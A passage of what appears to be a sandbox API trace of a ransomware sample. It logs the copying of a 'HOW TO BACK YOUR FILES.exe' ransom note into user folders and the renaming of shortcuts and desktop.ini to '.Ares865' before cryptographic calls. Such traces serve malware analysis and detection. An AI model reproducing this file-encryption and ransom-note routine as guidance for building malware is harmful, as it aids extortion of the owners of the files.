Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned 96 [0108.522] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E" [0108.522] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.522] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.523] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.523] GetLastError () returned 0x0 [0108.523] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC" [0108.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6dc0 | out: hHeap=0x2b0000) returned 1 [0108.523] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0108.524] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned 96 [0108.524] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC" [0108.524] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.524] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.524] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.525] GetLastError () returned 0x0 [0108.525] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR" [0108.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0108.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0108.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned 96 [0108.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR" [0108.525] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.525] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.526] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.526] GetLastError () returned 0x0 [0108.526] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0" [0108.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0108.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0108.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned 96 [0108.526] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0" [0108.526] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.526] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.527] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.527] GetLastError () returned 0x0 [0108.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch" [0108.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0108.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0108.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch") returned 87 [0108.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch" [0108.528] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.528] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.528] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.529] GetLastError () returned 0x0 [0108.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865") returned 107 [0108.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0108.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0108.532] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.532] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.532] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.533] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.534] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.534] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.535] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.Ares865") returned 113 [0108.536] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.ares865"), dwFlags=0x1) returned 1 [0108.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2281) returned 1 [0108.538] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.539] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.539] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.544] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.545] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.Ares865") returned 132 [0108.545] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.ares865"), dwFlags=0x1) returned 1 [0108.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1447) returned 1 [0108.548] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.549] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.549] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.554] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.555] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.555] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.555] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865") returned 113 [0108.555] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.ares865"), dwFlags=0x1) returned 1 [0108.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.558] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=290) returned 1 [0108.558] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.559] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.559] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.562] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.563] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.563] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.563] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865") returned 115 [0108.563] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.ares865"), dwFlags=0x1) returned 1 [0108.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.566] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0108.566] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.567] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.567] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.569] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.570] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.570] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.571] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0108.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0108.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0108.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 99 [0108.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0108.571] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.571] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.572] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.572] GetLastError () returned 0x0 [0108.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0108.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0108.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0108.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 107 [0108.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0108.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.573] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.573] GetLastError () returned 0x0 [0108.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865") returned 127 [0108.574] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0108.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 